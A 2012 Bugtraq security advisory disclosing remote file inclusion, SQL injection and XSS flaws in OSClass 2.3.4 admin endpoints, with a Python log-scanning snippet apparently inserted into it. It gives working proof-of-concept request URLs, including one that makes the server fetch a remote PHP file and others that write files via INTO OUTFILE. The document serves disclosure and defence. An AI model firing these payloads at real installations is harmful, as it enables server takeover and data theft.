List:       bugtraq
Subject:    Multiple vulnerabilities in OSClass
From:       Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date:       2012-01-30 12:31:58
Message-ID: 9FD841D6-CBAF-4238-9030-603BBF29384F () codseq ! it

Advisory ID:	CSA-12003
Title:	Multiple vulnerabilities in OSClass
Product:	OSClass
Version:	2.3.4 and probably prior
Vendor:	osclass.org
Vulnerability type:	SQL injection, XSS, Remote file inclusion
Vendor notification:	2012-01-12
Public disclosure:	2012-01-27


OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vulnerability allows an attacker to place an arbitrary file (e.g. a malicious PHP script) on the server under the www root, so it is possible to execute shell commands with the privileges of the web server. An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php


http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in the admin's ajax interface when performing the "edit_category_post" action. The GET parameter id is not sanitized. An attacker must be logged in as admin to exploit this vulnerability; magic_quotes_gpc must be off.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201




3) SQL injection in the admin's ajax interface when performing the "enable_category" action. The GET parameter id is not sanitized. An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201


(id must be a valid subcategory id; because this payload contains no quote characters, magic_quotes_gpc can be on in this case)



4) XSS in the admin's ajax interface. The GET parameter id is not sanitized. An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E


(id must be a valid category id)
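As an added defensive example (not part of this advisory and not OSClass code), the following Python scans web-server access-log lines for the four request shapes listed above: an upgrade request whose file parameter is a URL, or a category action whose id is not a bare integer. It assumes Apache/nginx common log format; the sample lines are constructed from the PoC URLs in this advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Admin-ajax actions whose `id` parameter the advisory reports as unsanitized.
ID_ACTIONS = {"edit_category_post", "enable_category"}
# Common log format (assumed): host ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample: the four request paths from the advisory plus one benign request.
PATHS = [
    "/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php",
    "/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201",
    "/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201",
    "/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E",
    "/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2",  # benign: plain integer id
]
SAMPLE_LOG = [f'10.0.0.5 - - [30/Jan/2012:12:31:58 +0100] "GET {p} HTTP/1.1" 200 512' for p in PATHS]

def classify_request(path):
    """Return a finding label for one request path, or None if it looks benign."""
    parts = urlsplit(path)
    if not parts.path.endswith("/oc-admin/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    if qs.get("page", [""])[0] != "ajax":
        return None
    action = qs.get("action", [""])[0]
    if action == "upgrade":
        file_arg = qs.get("file", [""])[0]
        # Issue 1: the upgrade action given any URL scheme instead of a local package name.
        if re.match(r"[a-z][a-z0-9+.-]*://", file_arg, re.I):
            return "remote-file-inclusion: upgrade&file=" + file_arg
    elif action in ID_ACTIONS:
        id_arg = qs.get("id", [""])[0]
        # Issues 2-4: a category id is a bare integer. Checking the type rather than hunting
        # for quotes also flags the quote-free payload of issue 3, which magic_quotes_gpc ignores.
        if not re.fullmatch(r"\d+", id_arg):
            return f"unsanitized-id: {action}&id={id_arg}"
    return None

def scan_log(lines):
    """Return [(client, status, finding)] for every suspicious request line."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        client, path, status = m.groups()
        finding = classify_request(path)
        if finding:
            hits.append((client, status, finding))
    return hits
```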


Solution

Upgrade to OSClass 2.3.5:

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it
